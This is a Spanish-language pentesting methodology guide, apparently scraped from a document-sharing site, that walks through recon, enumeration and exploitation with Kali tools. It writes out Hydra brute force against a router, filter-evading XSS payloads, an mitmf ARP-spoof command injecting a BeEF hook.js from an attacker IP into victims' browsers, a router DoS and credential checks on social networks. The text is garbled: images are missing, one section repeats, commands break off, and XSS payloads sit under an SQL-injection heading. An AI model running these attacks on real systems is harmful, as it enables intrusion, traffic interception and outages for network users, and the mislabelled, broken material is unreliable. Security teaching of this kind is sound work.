Académique Documents
Professionnel Documents
Culture Documents
ANATOMÍA Y METODOLOGÍA
DE UN PENTESTING
Mira los videos en YouTube (Anonimo501) POR ANONIMO501
Partes de la Anatomía:
1) Recolección de información/Footpriting/Doxing
Libro PDF
*Osint
-Maltego
-Theharvester
-Metagoofil
-Foca
*Whois
-whois Linux
-whois Windows
*DNS
-Dnsrecon
-Fierce
-Recon-ng
-Urlcrazy
*Reverse IP
-Nslookup
*Whois HostingThis
-Averigua que hosting usa cualquier sitio web (Descubra quién es el proveedor de alojamiento de
cualquier sitio web)
https://es.hostadvice.com/tools/whois/
https://www.whoishostingthis.com/es/
-Metagoofil
Mira los videos en YouTube (Anonimo501) POR ANONIMO501
-Foca
2) Enumeración/Escaneo
* Levantamiento de información
-Direcciones
-Rangos IP
-Vlans
-Equipos Activos
-Detección de DNS
-Detección de IDS
-IPS
-Firewalls
-WAFS
-Balanceadores de Carga
-Proxys
-Recursos Compartidos
3) Análisis
Modelado de Infraestructura
Servicios
Aplicaciones
Sistemas Operativos
4) Explotación
Fuerza Bruta
Cracking Passwords
Ingeniería Inversa
Actualización Maliciosa
Generación de Exploits
Escalar Privilegios
Pivoting
Dump de Información
5) Documentación
Documento de Confidencialidad
1) RECOLECCIÓN DE INFORMACIÓN
(Resumen).
La Recopilación de información nos permite tener o crear un perfil casi completo de la seguridad de una empresa u
organización.
A continuación, veremos los puntos que debemos intentar identificar que son puntos críticos para una empresa.
-INTERNET:
Nombre de Dominio.
Direcciones IP específicas de Sistemas a los que se Puede Acceder por Medio de Internet.
Enumeración de Sistemas (Nombres de Usuario y Grupo, Anuncios del Sistema, Tablas de Enrutamiento e
Información SNMP).
-INTRANET:
Bloques de Red.
Dirección IP Especificas de Sistemas a las que Puede Accederse por Medio de Intranet.
Sistemas de Enumeración (Nombres de Usuario y Grupo, Anuncios Del Sistema, Tablas de Enrutamiento e
Información SNMP).
-Acceso Remoto:
Mecanismos de Autenticación.
Mira los videos en YouTube (Anonimo501) POR ANONIMO501
VPN y Protocolos Relacionados (IPSec y PPTP).
-Extranet:
Nombres de Dominio.
Tipo de Conexión.
Crear una copia completa de la página web para ser analizada de forma offline.
Esto lo podremos hacer con el programa HTTRACK (En el canal de YouTube hay un video de cómo hacer la copia
con la herramienta link: https://www.youtube.com/watch?v=KwNHcB6Mgq0&t=1s)
Organizaciones Relacionadas.
Nombre de la Compañía, Ciudad donde está Situada la Compañía, Nombre del Autor, Nombre del Cliente a
Quien le estamos Haciendo la Auditoria.
Detalles de Ubicación.
Conseguir las Coordenadas de la Ubicación, Tomar Imágenes/pantallazos para que Pueda Familiarizarse con el
Edificio, Lo que Rodea, Las Calles y el Transito en el Área.
Cualquier tipo de Archivo, programa, cualquier información que proporcione conocimientos sobre la privacidad.
Información Archivada.
Buscar en Internet este tipo de información puede ser eliminada deliberadamente por razones de seguridad.
Empleados Inconformes.
Otra Amenaza Real Puede Provenir de Empleados Inconformes que Publiquen Información al Respecto.
ttps://docs.google.com/uc?export=download&id=1_JXSQBYmQkvxodt1yC61-Quv9AZdjaOi
Estos comandos sirven para encontrar información pública y en ocasiones fuga de datos sobre el dominio y/o empresa
auditada.
COMANDOS:
Site:dominio.com index of
Site:dominio.com intranet
Site:dominio.com administrador/admin
Site:dominio.com error/warning
Site:dominio.com login/logon
Site:dominio.com confidencial/private/privado/restringido
Mira los videos en YouTube (Anonimo501) POR ANONIMO501
*MALTEGO
Con Maltego podremos encontrar mucha información tales como correos, teléfonos, servidores y mucho más, muy
importante hacer un escaneo con Maltego.
* THEHARVESTER
con TheHarvester buscaremos correos relacionados. (con –f nombre.html guardamos el escaneo en HTML).
Comando: theharvester -d unoraya.com -b all -l 100 -f archivo.html (este comando hace FULL HARVESTER)
Mira los videos en YouTube (Anonimo501) POR ANONIMO501
*METAGOOFIL
Esta herramienta busca diferentes tipos de archivos de las diferentes extensiones pdf, doc., docx, Excel, ppt, ppx, etc.
Se está limitando la búsqueda a 2000 en este caso y se está creando una carpeta con el nombre umkali.
(SHODAN)
Escribimos el dominio a escanear y le damos en la flecha verde para que inicie el escaneo, aquí podemos ver que la
herramienta a determinado con un 44.58% de que el servidor web es un Apache Microsoft-IIS/6.0.
Mira los videos en YouTube (Anonimo501) POR ANONIMO501
*Web Data Extractor
Esta herramienta nos permite encontrar información tal como las URL que tiene asociada esa página WEB, también nos puede
mostrar direcciones de correo electrónicos y números de teléfonos que hay en la base de datos de la página.
(HTTPrecon):
Recolección de huellas digitales del servidor web.
Mira los videos en YouTube (Anonimo501) POR ANONIMO501
*FOCA
En foca podremos ver dominios, IPs, Documentos, podremos hacer escaneo de metadatos, entre otras cosas.
EXIFTOOL
Nos permite escanear documentos y extraer información detallada que puede ser de gran interés.
Descargan exiftool para windows lo guardan y entran a su ubicación para abrir el símbolo de sistema
Y lo ejecutan con el siguiente comando:
“exiftool(-k).exe” ”websploit ataques MITM.PNG”
Donde exiftool(-k).exe es el nombre de la herramienta y websploit ataques MITM.PNG es el nombre del archivo el
cual queremos extraer la información.
Link de descarga: https://www.sno.phy.queensu.ca/~phil/exiftool/
Mira los videos en YouTube (Anonimo501) POR ANONIMO501
NSLOOKUP
Nslookup resuelve la IP ingresando el nombre de dominio o al revés.
*WHOIS
Mediante la búsqueda de whois podremos encontrar (el nombre del propietario del dominio, dirección IP, el contacto
administrativo, el contacto técnico, números telefónicos etc.).
Hay muchos sitios en internet que nos permitirán hacer whois a la página que deseamos pero también podemos hacer este tipo
de escaneo desde Linux la verdad hay muchas opciones para esto, en este caso solo les mostrare 2 primero un escaneo por la
IANA: https://www.iana.org/whois y otro desde Linux.
En Linux:
Comando: whois ejemplo.com
*DNSRECON:
Transferencia De Zona
Tabla de los diferentes servidores que podemos encontrar en un escaneo de Transferencia de Zona.
*FIERCE
Realiza Transferencia de Zona Con más detalle que el Anterior.
(DNS Discovery): Obtener la IP del servidor, flags, pregunta (QUESTION SECTION) y respuesta (ANSWER SECTION).
Con una sola consulta (ANY) podremos obtener todos los nombres de los DNS asociados del dominio (conexionio.com) el cual
estamos preguntando, con esta consulta podemos obtener los servidores DNS del dominio, servidores de correo.
Luego cargamos el archivo que creamos con la lista de ANSWER SECTION y AUTHORITY SECTION que obtuvimos antes.
Y ya nos mostrara los DNS cacheados. (aquí nos damos cuenta que los usuarios de la empresa han visitado fastwebhost.com).
Mira los videos en YouTube (Anonimo501) POR ANONIMO501
(DNS Bruting: Metasploit): También con Metasploit mediante fuerza bruta de nombres DNS podemos obtener los nombres de
subdominios del dominio que estamos auditando, el diccionario que se usa ya está incluido dentro de Metasploit solo hay que
activarlo y fijarlo con el comando (set ENUM_BRT true).
Mira los videos en YouTube (Anonimo501) POR ANONIMO501
(Banner Grabbing): Con Banner Grabbing podremos saber el Tipo de versión de Software utilizado y los tipos de Servicios.
(NETCRAFT)
Sistema operativo utilizado por el servidor y dirección de la empresa:
Mira los videos en YouTube (Anonimo501) POR ANONIMO501
*RECON-NG
Sirve para hacer reconocimiento para hacer recolección de información podemos hacer etapas de secuencia para la recolección
de información esto lo almacena en una base de datos. (hecha en Python)
Formas de uso:
Con help vemos las opciones. (Serie de comandos con lo que se podrá trabajar).
Mira los videos en YouTube (Anonimo501) POR ANONIMO501
Comando: search domain
Con show veremos las opciones y con show dashboard veremos los módulos que se han corrido
Si tipeamos show info nos mostrara la información del módulo que hemos seleccionado.
Luego de setear la página a escanear le decimos run para que comience a buscar dentro de Google.
Mira los videos en YouTube (Anonimo501) POR ANONIMO501
Ahora veremos las entradas con el comando show dashboard.
Tipeamos show domains para ver si dentro de lo que escaneamos encontramos un dominio.
Escribimos: run
Para que resuelva todas las IP de los hosts escaneados anteriormente como yo solo encontré uno el resolverá solo esa IP.
para buscar el resto de los campos faltantes en la tabla de los hosts ya encontrados usamos el
Y podremos ver en la tabla de arriba que se han agregado los dominios encontrados.
Escribimos: run
Y veremos de nuevo con el comando: show hosts Las IPs nuevas que se han resuelto.
Mira los videos en YouTube (Anonimo501) POR ANONIMO501
(SMTP_ENUM)
El módulo de enumeración SMTP se conectará al servidor de correo dado y usará una lista de palabras para enumerar los
usuarios que están presentes en el sistema remoto.
Usar el módulo es una simple cuestión de escanear y una lista de palabras que contiene nombres de usuario para enumerar.
Mira los videos en YouTube (Anonimo501) POR ANONIMO501
Primero escaneará un rango y encontrará servidores de correo, después encontrará usuarios, como en la siguiente imagen
(podríamos utilizarlos para generar un ataque de Diccionario).
Mira los videos en YouTube (Anonimo501) POR ANONIMO501
* URLCRAZY
Esta herramienta encuentra si han creado paginas phishing o dominios parecidos a la página o sitio original.
En este proceso no nos va a mostrar el dominio original solo nos mostrara dominios generados parecidos el cual pueden estar
siendo usados para hacer phishing.
También podremos saber si el dominio que estamos auditando posee más dominios. (para poder investigarlos y ver si son
vulnerables).
Ayuda a conocer nombres parecidos a la página original para obtener o conseguir el dominio y poder usarlo como phishing o
ingeniería social, también muestra que sitios han o no han sido usados para esto.
Encontraremos que por Omisión (Se omiten palabras) Son páginas que han creado omitiendo letras para crear paginas phishing
Aquí vemos un Swaping o Swap el cual consiste en alterar los caracteres (cambia el orden de las letras).
2) ENUMERACIÓN
*NETDISCOVER
Comando: netdiscover
*NBTSCAN
(Para resolver los nombres de las maquinas o NetBIOS)
*SMTP–USER–ENUM
Digamos que es como la oficina de correos de la web: recoge el email del remitente y lo entrega en la oficina de correos
local del destinatario, que es otro servidor SMTP.
cd /usr/share/wordlists/
No solo podríamos buscar en los dominios, si lo hacemos en entornos locales cambiar el www.ejemplo.com por la ip del
dispositivo el cual vamos a buscar el usuario ejemplo del comando seria.
Comando: smtp-user-enum -h
Comando: smtp-user-enum -M VRFY -U users.txt -D www.ejemplo.com -t 1000 (podemos usar un archivo txt con usuarios)
Podríamos también buscar otro usuario cambiando postgres por el usuario root también con el
*SNMPCHECK
SNMP (es un protocolo que les permite a los administradores de red administrar dispositivos de red y diagnosticar sus
problemas. El protocolo SNMP tiene dos formas de trabajar: polling y traps. El polling se apoya en enviar consultas remotas ya
sea de forma activa o bajo demanda, ejecutando una operación síncrona de consulta. Los traps, sin embargo, son más bien
mensajes que lanzan los dispositivos SNMP a una dirección ya constituida, basándose en cambios o eventos, esta vez de forma
asíncrona.)
*SNMP-CHECK
Snmpwalk saca toda la información en bruto (hacer una prueba para ver que info trae)
Mira los videos en YouTube (Anonimo501) POR ANONIMO501
*ENUM4LINUX
Enum4linux nos extrae más información del sistema o equipo que vamos a escanear (usuario políticas de contraseñas etc).
*NMAP
si cambian un servicio de un puerto estándar por ejemplo FTP lo cambian de puerto en GENERAL NMAP lo reconoce por que
NMAP DETECTA la FIRMA de los SERVICIOS o detecta la HUELLA con la cual se identifica el servicio por lo tanto NMAP no
reconoce por el NUMERO DE PUERTO si no por sus FIRMAS/HUELLAS.
NMAP no solo sirve para escanear una RED LOCAL también puede escanear una red FUERA de LAN y escanear Ips externas.
Comando: nmap -sS -sV -O -A 192.168.1.0/24 (Detecta los servicios en el rango de IPs).
El siguiente comando muestra los usuarios del sistema que estamos escaneando por el protocolo SMB puerto 445.
Scan Smtp
Comando: netdiscover (Aquí nos podemos dar cuenta de los equipos activos en red)
(Nbstat.nse) UDP
Nmap cuenta con numerosos scripts NSE orientados a SMB que pueden ahorrar mucho tiempo a la hora de buscar recursos
compartidos mediante UDP, conseguir nombres de usuario o buscar vulnerabilidades.
Mira los videos en YouTube (Anonimo501) POR ANONIMO501
*NETATTACK2
Chequeo de máquinas seleccionadas o inventariadas.
Comandos de instalación:
#~ cd CrackMapExec
#~ pipenv shell
COMANDOS:
Comandos.
Net view:
Muestra información de los equipos enumerados que se encuentran visibles en la red local.
Escogemos el pc al que deseamos ingresar en este caso PCESCRITORIO-PC, este comando es para establecer la sesión nula y
Tipeamos de nuevo net use para verificar que hay una conexión establecida como en la siguiente imagen:
¡Excelente!! Una vez dentro podremos ver sus recursos compartidos (En este caso no se logró entrar).
Tipeamos el comando.
Podrá usar nombre NetBIOS, IP privadas o IP públicas (siempre que el servidor tenga abierto en el Ruter el puerto 139 [NetBIOS]).
CABE RESALTAR QUE UNA VES AQUÍ LOS SIGUIENTES COMANDOS FUNCIONARAN EN UN CONTROLADOR DE DOMINIO.
Si desea obtener una lista de los diferentes ordenadores que están en funcionamiento y pertenecen a un determinado dominio o
grupo de trabajo en este ejemplo el dominio (CORREO).
Y demás comandos:
Net accounts
Net group
Net localgroup
Net start
3) ANÁLISIS
Mira los videos en YouTube (Anonimo501) POR ANONIMO501
*OPENVAS
Para iniciar OPENVAS por primera vez ejecutamos:
Si ya instalamos openvas ejecutando openvas initial setup y no inicia o crea problemas tiene problemas ejecutaremos
openvas start
Vamos a usar OpenVAS para analizar vulnerabilidades de los computadores más importantes de la red como podría ser por
ejemplo 2 servidores ya que esta herramienta es lenta en su escaneo ya que profundiza escaneando las distintas
vulnerabilidades de los mismos.
Primero vamos a configuration y seleccionamos target (configuramos el objetivo a escanear con su ip respectiva)
Seleccionamos Scans y en el submenú Tasks (si no aparecen los gráficos no olvidar ir al menú del navegador y deshabilitar en
add-ons NoSCRIPT al deshabilitar NoSCRIPT cargaran los gráficos y no tendremos problemas para crear los escaneos).
Mira los videos en YouTube (Anonimo501) POR ANONIMO501
Posamos el cursor sobre la estrella y hacemos click sobre New Task
Después vamos a la parte inferior derecha y damos en Start para que inicie el escaneo que como ya dije antes.
Mira los videos en YouTube (Anonimo501) POR ANONIMO501
Una vez terminado el escaneo o antes si lo desean vamos a Scans y hacemos click en Reports, en la parte izquierda superior
podemos elegir en qué tipo de documento deseamos exportar el reporte ya sea xml, HTML, ftp, txt etc que nos servirá para
agregar al reporte.
openvasmd --list-users
*WIRESHARK
Wireshark es un sniffer de red analizador de trafico
Cuando hacemos un análisis de tráfico a una RED Ethernet (LAN), Cuando vamos analizar una Red LAN o Ethernet
necesitaremos configurar un ARP SPOOFING para ponernos en la mitad (Ataque Man In The Middle) y que todo el tráfico pase a
través de nosotros y poderlo leer.
Para escanear una RED Ethernet (LAN) sin hacer el procedimiento anterior solo podremos ver el tráfico que viene hacia nosotros
que sale de nosotros y que va para broadcast el tráfico de los demás equipos no vamos a poder identificarlo.
Comando para ver el tráfico de una sola IP y su Destino: ip.src == 192.168.1.56 and ip.dst == 8.8.8.8
Mira los videos en YouTube (Anonimo501) POR ANONIMO501
Comando: http
Para capturar el Trafico de la RED Ethernet (LAN) podremos hacerlo con ethercap de la siguiente manera:
Mira los videos en YouTube (Anonimo501) POR ANONIMO501
Mira los videos en YouTube (Anonimo501) POR ANONIMO501
Hay que tener en cuenta que si ATACAMOS el ROUTER estaríamos capturando todo el tráfico de la red (todos los dispositivos)
afectaríamos la tabla ARP y TUMBARÍAMOS LA RED.
Wireshark captura lo que es las peticiones http y conversaciones de chat siempre y cuando no viajen cifradas y mucho más.
(Todo en HTTP se puede leer y Todo lo que NO va CIFRADO ósea en TEXTO plano).
Tamaño de paquete
Destino - quien lo envía - Cuanto pesa - Donde se mandó si hubo respuesta o no – Strings – Contraseña – Usuarios - Mails
No sobra comentar que esta herramienta es de código abierto por lo cual puede ser modificada a nivel personal (personalizada).
*BIFURCACIÓN (IMPORTANTE)
En este punto hacer la bifurcación, si la infraestructura, servicios, apps y sistemas operativos, tienen metodología propia >
aplicar metodología de BIFURCACION y pasar a la parte de DOCUMENTACION > si esto no se cumple y no hay metodología
propia en la empresa seguiremos con nuestro Pentest siguiendo con la fase de EXPLOTACION.
*WHATWEB
Esta herramienta sirve para identificar que tecnología está trabajando la aplicación web.
Gestor cms, frameworks para blogs, librerías JavaScript, dispositivos con acceso web y obtendremos:
Versión del servidor, tecnologías empleadas, direcciones de correo, páginas de error. (en summary podemos ver el resultado)
*SSLSCAN
Identifica los servicios SSL si es vulnerable o no, Detecta las versiones y variantes SSL.
Mira los videos en YouTube (Anonimo501) POR ANONIMO501
Básicamente es un protocolo, que proporciona servicios de seguridad cifrando los datos intercambiados entre el servidor y el
cliente. Permite que la información viaje encriptada evitándose que puede ser leída.
*WAFW00F
Waf = un WAF es una aplicación web detrás de un firewall, este WAF protege de ataques como SQL inyección, denegación de
Servicios ETC.
WAF es una abreviación en inglés que significa Firewall para Aplicaciones Web. Y para que sea fácil de entender, imagina que tu
sitio web es tu casa y la gente que está afuera en las calles es el tráfico que quiere ingresar a tu sitio web. Está claro que quieres
abrirle la puerta a amigos y familiares, pero también quieres proteger tu casa de los malhechores. Eso es exactamente lo que
hace el firewall. El WAF es un cerrojo inteligente para tu casa. Un WAF mantiene el tráfico malicioso fuera de tu sitio web. En
otras palabras, un WAF es una capa de protección que se ubica entre tu sitio web y el tráfico que recibe.
Wafw00f: Nos permite identificar qué tipo de Waf tiene la empresa.
*WPSCAN
Sirve para escanear vulnerabilidades a páginas creadas en Wordpress.
*JOOMSCAN
La herramienta analizara los módulos y mostrara cuales son o no son vulnerables.
*NIKTO
Nikto nos permite saber o identificar la tecnología que tiene una aplicación web permite hacer enumeración, descubrimiento
ver si tiene errores, etc. (Es un analista de plataformas Web).
Nikto nos traerá esta mucha información más solo que hay que hacer el escaneo con tiempo ya que es demorado (tarda en
hacer el escaneo a la página).
*BADMOD BOT
Esta herramienta nos mostrara: Robots File, reverse DNS (muestra si es Wordpress/Joomla u otro), nos muestra si es vulnerable,
subdominios, CMS entre otros.
Mira los videos en YouTube (Anonimo501) POR ANONIMO501
Mira los videos en YouTube (Anonimo501) POR ANONIMO501
Ejecutamos XAtacker.pl
Nos pregunta que si tenemos una lista de sitios web para escanear le decimos que si marcando con 1 y escribimos el nombre de
la lista de webs a escanear.
En caso de encontrar vulnerabilidades nos mostrara el link e iremos a verificar la existencia de las mismas.
Si con el archivo de texto la herramienta no trae ningún resultado probar con la opción no (2) después la opción 2 nuevamente
pegar la URL y ya la herramienta comienza el escaneo (Este escaneo es muy Completo).
Cred0v3r
Mira los videos en YouTube (Anonimo501) POR ANONIMO501
Investigar si los Correos y Contraseñas obtenidas son funcionales o verdaderas En Redes Sociales, estos usuarios y contraseñas
pudimos haberlos obtenido de los escaneos anteriores.
con esto podremos verificar rápidamente si las cuentas son reales y en que paginas tienen cuentas creadas.
Si la contraseña ingresada y el correo son válidos veras en verde login successful de lo contrario se verá como malo así el correo
exista en alguna red social no se verá como verdadero si la contraseña no es correcta.
*GOLISMERO
Mira los videos en YouTube (Anonimo501) POR ANONIMO501
Golismero es un framework y nos ayuda a integrar muchas herramientas/trae muchas herramientas para el proceso de
Pentesting, de auditorías web.
Esta herramienta trabaja con nmap, sslscan, Shodan, theharvester, openvas, y mucho más esta herramienta intenta hacer
transferencia de zona y un largo etc.
*DIRBUSTER
Mira los videos en YouTube (Anonimo501) POR ANONIMO501
Dirbuster nos detecta el árbol de carpetas o directorios que tiene la plataforma web que estamos auditando, para esto es
necesario pasarle una lista o diccionario con posibles nombres de diccionarios para que él pueda ir creando el árbol de
directorios.
El diccionario que podemos usar para este tipo de ataque no es necesario crearlo el diccionario ya está creado, Kali Linux ya lo
trae integrado también lo trae integrado el sistema operativo parrot OS el diccionario se encuentra en la ruta:
/usr/share/wordlists/dirbuster/diccionarioquedeseemoselegir
Comando: dirbuster
Mira los videos en YouTube (Anonimo501) POR ANONIMO501
Mira los videos en YouTube (Anonimo501) POR ANONIMO501
Mira los videos en YouTube (Anonimo501) POR ANONIMO501
*BURPSUITE
Reconocimiento Activo con burp suite, podremos encontrar cuentas de correo, directorios, direcciones IP de ámbito privado,
etc.
Para usar burp suite debemos configurar el navegador como proxy y burp suite para que pueda capturar todo de la página.
(Otro Vector de Ataque que podría ser usado). Encontrar las páginas de logueo es un vector de ataque ya que se
podría implementar un Ataque de Diccionario.
Mira los videos en YouTube (Anonimo501) POR ANONIMO501
*OWASP ZAP
Escaneo de vulnerabilidades con Owasp zap
Con Owasp zap podremos encontrar vulnerabilidades automáticamente en un entorno grafico muy agradable, después
podremos ir y verificar que sean reales manualmente y no que sean falsos positivos.
*VEGA
Vega es otro analizador de vulnerabilidades automático del cual nos podremos ayudar.
Mira los videos en YouTube (Anonimo501) POR ANONIMO501
Podemos buscar dentro de los resultados e ir a comprobar manualmente la vulnerabilidad.
Mira los videos en YouTube (Anonimo501) POR ANONIMO501
4) EXPLOTACIÓN
*SQL INYECCION
Sql inyección básicamente es insertar secuencias/sentencias sql por medio de los formularios, envió de datos o solicitudes de las
aplicaciones que están conectadas a una base de datos para obtener información de la misma.
Este método de ataque puede ser enviado o inyectado por método GET o método POST. Escanea las bases de datos relacionales
únicamente, como lo que es Mysql, postgres, Oracle, dbOS, SQLserver, etc.
Nivel (1)
<script>alert("HolaSoyVulnerable")</script>
Nivel (2)
En caso que no funcione la etiqueta normal podremos cambiarla usando la misma solo modificando unas letras
minúsculas por otras mayúsculas: (Esto se hace para evadir filtros de seguridad).
<ScriPt>alert("HolaSoyVulnerable")</sCripT>
Mira los videos en YouTube (Anonimo501) POR ANONIMO501
Nivel (3)
<scri<Script>pt>alert("hacked")</scri</SCript>pt>
Nivel (4)
Si ninguna de las etiquetas anteriores funciona es por que la etiqueta alert ya ha sido bloqueada completamente
por lo cual usaremos una etiqueta de imagen para generar un error y asi darnos cuenta de que es vulnerable:
Nivel (5)
Ya en este nivel deberíamos empezar a usar los caracteres ASCII ya que la etiqueta alert nos lo han bloqueado
por su seguridad para saltarnos ese filtro usaremos la etiqueta prompt de la siguiente manera:
<Script>prompt("XSS")</scripT>
Nivel (6)
";alert('XSS');"
";prompt('XSS');"
Nivel (7)
Este nivel es parecido al anterior con la diferencia de las comillas simples y el numero, si el nivel anterior
no funciono (no muestra resultados) y la pagina es vulnerable y no muestra el mensaje lo modificamos por el
siguiente comando:
';alert(10);'
Nivel (8)
En este caso sería completar el código que hay dentro de la página primero cambiar del método POST al método GET
verificar que si cambia la URL y ver el código fuente action="/xss/example8.php y terminar de completarlo para
/"><script>alert(10);</scripT>
Cuando en la URL hay un # es posible o podría ser posible inyectar XSS básico por ejemplo con este comando:
<script>alert(12)</script>
Igual en el navegador ponemos en manual proxy la IP 127.0.0.1 o localhost y el puerto 8080 que es el que vamos a usar.
Mira los videos en YouTube (Anonimo501) POR ANONIMO501
Introducimos cualquier usuario y contraseña solo para que en Burp Suite podamos ver y modificar para enviar el Ataque.
Seleccionamos la contraseña cifrada para ir a decode base 64 y descifrarla (esta fue la información que ingresamos user y pass)
Mira los videos en YouTube (Anonimo501) POR ANONIMO501
Seleccionamos (subrayamos) de nuevo y le damos a la opción Add para seleccionar y nos dirigimos a la pestaña payload.
Una vez en payload configuramos brute forcé ya que haremos un ataque de fuerza bruta en character set escribimos los
caracteres y letras que se van a usar para el ataque.
Aquí añadimos un add prefix que es el usuario en este caso y seguido con dos puntos.
Mira los videos en YouTube (Anonimo501) POR ANONIMO501
Añadimos otro add en este caso Encode Base64-encode que es el tipo de cifrado.
Aquí quitamos el signo = ya que el cifrado de base 64 termina con dos iguales de esta forma == y para que no se agregue uno
mas.
Con HYDRA podremos hacer ataques a los login de las paginas Auditadas en esta ejemplo se está auditando el Rúter con el
comando: hydra -L logins.txt -P pws.txt telnet://192.168.1.1
El cual estamos posicionados en el escritorio (Desktop) donde en esta ubicación tenemos el archivo de texto logins.txt que es el
que contiene la lista de los posibles User y en el archivo de texto pws.txt están todas las posibles contraseñas por último
colocamos el servicio que se va Auditar en este caso TELNET separando de la IP con :// en este punto solo deberíamos dar enter
para enviar el Ataque.
Al final del Ataque con HYDRA nos mostrara los resultados donde dice 1 de 1 objetivos completados y si dimos con alguna
contraseña nos mostrara el número de contraseñas y usuarios acertados.
Podríamos usar la versión GUI de Hydra si no deseamos usar los comandos esta versión se llama XHYDRA.
Comando: xhydra
Mira los videos en YouTube (Anonimo501) POR ANONIMO501
*SOCIAL BOX
Mira los videos en YouTube (Anonimo501) POR ANONIMO501
*ESCANEO DE RED CON NET.
Los Sistemas de Microsoft Windows disponen de un sistema de comunicaciones de red basado en el protocolo NetBIOS, se creó
con el fin de compartir recursos entre ordenadores en una Red LAN el cual vela por el correcto envió de información a través de
la comunicación.
(usaremos los siguientes comandos para el correcto análisis de la red y obtener la mayor información posible a la hora de un
Pentesting e intentar vulnerar los sistemas mediante una sesión nula para la documentación del INFORME).
Comandos.
Net view:
Muestra información de los equipos enumerados que se encuentran visibles en la red local.
Escogemos el pc al que deseamos ingresar en este caso PCESCRITORIO-PC, este comando es para establecer la sesión nula y
Tipeamos de nuevo net use para verificar que hay una conexión establecida como en la siguiente imagen:
¡Excelente!! Una vez dentro podremos ver sus recursos compartidos (En este caso no se logró entrar).
Mira los videos en YouTube (Anonimo501) POR ANONIMO501
Tipeamos el comando.
Podrá usar nombre NetBIOS, IP privadas o IP públicas (siempre que el servidor tenga abierto en el Ruter el puerto 139
[NetBIOS]).
CABE RESALTAR QUE UNA VES AQUÍ LOS SIGUIENTES COMANDOS FUNCIONARAN EN UN CONTROLADOR DE DOMINIO.
Si desea obtener una lista de los diferentes ordenadores que están en funcionamiento y pertenecen a un determinado dominio
o grupo de trabajo en este ejemplo el dominio (CORREO).
Y demás comandos:
Net accounts
Net group
Net localgroup
Net start
Iniciamos Metasploit.
Comando: msfconsole
Comprobamos que la base de datos de Metasploit esté funcionando (Dentro de la consola de Metasploit).
Comando: db_status
Mira los videos en YouTube (Anonimo501) POR ANONIMO501
Ejecutamos el escaneo con el comando db_nmap.
(Una vez iniciados los servicios procedemos a verificar Vulnerabilidades a nivel de Sistemas Operativos)
Cargamos el módulo de auxiliar para verificar los servicios SMB con el siguiente comando.
Ahora escaneamos los equipos de la red solamente cuyo puerto 445 este Activo.
Comando: exploit
Los signos [+] de color verde que aparecen al lado izquierdo son las maquinas vulnerables.
Hacemos un escaneo completo a la Red para ver que equipos vulnerables hay para proceder a vulnerarlos (Dentro de
Metasploit).
IMG de Escaneo.
Mira los videos en YouTube (Anonimo501) POR ANONIMO501
Ahora que sabemos que Equipos son vulnerables pasemos a Explotar una maquina Windows 7 las que aparecen con el nombre
Windows 5.1 son máquinas con sistemas operativos XP.
Comando: show options (Para verificar que haya quedado bien configurado)
Bien ya se ha vulnerado ahora solo restaría tomar evidencia de la intrusión y ponerla en el reporte.
Mira los videos en YouTube (Anonimo501) POR ANONIMO501
*ATACAR EQUIPOS EN RED CON BEEF
Aremos esta auditoria con Kali Linux usando (MITMF + BEEF), primero elegimos un objetivo (IP) al cual atacar con Network
Scanner o cualquier otro escáner de Red Local.
Ahora instalaremos MITMF con el comando (apt-get install mitmf) si no te permite instalar probamos actualizando primero con
(apt-get update) y después probamos de nuevo (apt-get install mitmf).
También Instalaremos un paquete necesario que trabaja con MITMF para esta auditoria lo aremos con el siguiente comando
(pip install Twisted==15.5.0)
Ejecutamos BEEF esperamos a que se ejecute y se abra el navegador e ingresamos con el usuario beef y password beef.
Vamos a una consola y tipeamos el siguiente comando para Atacar (mitmf --arp --spoof --targets 192.168.0.104 --gateway
192.168.0.1 -i wlan0 --inject --js-url http://192.168.0.112:3000/hook.js) targets 192.168.0.104 es la ip victima Gateway es la
Mira los videos en YouTube (Anonimo501) POR ANONIMO501
dirección ip del Ruter wlan0 es la interfaz de Red y http://IPATACANTE/hook.js es la url que genero BEEF con la cual vamos a
infectar la Red.
Bueno una vez cargue MITMF debemos esperar a que la víctima navegue en internet desde cualquier navegador para que el
ataque termine de concluir y comprometer el PC o Dispositivo que decidas Atacar. En la siguiente imagen se muestra los
dispositivos infectados en la Red.
Abrimos el navegador introducimos las IPs para intentar acceder con contraseñas por defecto y ver si son vulnerables.
Mira los videos en YouTube (Anonimo501) POR ANONIMO501
*ROUTERS VULNERABLES (VERIFICAR SI EL ROUTER ES VULNERABLE CON ROUTERSPLOIT)
Con este ataque verificaremos si el router está seguro o es vulnerable ante la herramienta ROUTERSPLOIT.
Instalación:
Comandos:
cd routersploit
python3 rsf.py
USO:
use scanners/autopwn
run
ACTUALIZAR:
cd routersploit
git pull
Mira los videos en YouTube (Anonimo501) POR ANONIMO501
*ATAQUE DOS AL RUTER O AP CON APFUCKER Y LINSET
Con este ataque podremos ver si el router es vulnerable a un ataque de DOS para así quitar el internet a todos los dispositivos
de la red.
Primero ejecutamos el LINSET y ponemos a escanear la red que queremos atacar y lo dejamos allí para sacar la información que
debemos digitar el APFUCKER.
Abrimos APFUCKER y tipeamos la letra t luego ingresamos la información que nos va pidiendo como es la siguiente imagen.
Por ultimo cuando nos pida confirmación le damos que si con la letra y damos enter y empieza el ataque.
Mira los videos en YouTube (Anonimo501) POR ANONIMO501
*ARMITAGE
Con armitage podemos tener comunicación con nuestros compañeros de Pentesting de esta manera trabajar en la misma
infraestructura.
Creado en java.
Armitage tiene un chat el cual nos podemos comunicar con el equipo de la Auditoria de Pentesting, en el chat también se
mostrará los procesos o escaneos que han hecho nuestros compañeros.
También podremos hacer Escaneos, Explotación desde Armitage, enumeración para ver puertos ver la red de una forma más
gráfica, identificando los sistemas operativos, después de todo esto permitirá hacer el proceso de PIVOTING entre muchas otras
cosas más.
ARMITAGE NO es solo metasploit de entorno grafico (GUI) tiene muchas más funciones mencionadas antes.
-PIVOTING: en el proceso de Pivoting podremos después de infectar una máquina de una infraestructura podremos infectar más
maquinas o dispositivos de la Red logrando así de esta forma burlar FIREWALLS, IDs y más.
Sniffer De RED
Con Wireshark podremos Sniffear la RED para ver todo el tráfico de paquetes de la misma también ayudándonos de la
herramienta NetworkMiner que mina la información aún más al detalle de la red y así poder ver más claramente todo lo que
ocurre en la RED.
Guardamos el escaneo de Wireshark en la opción File -> Save As. Lo guardaremos con la extensión .pcap para posteriormente
cargar el archivo a NetworkMiner.
Cargamos el archivo .pcap que guardamos del escaneo con Wireshark para ser analizado.
Mira los videos en YouTube (Anonimo501) POR ANONIMO501
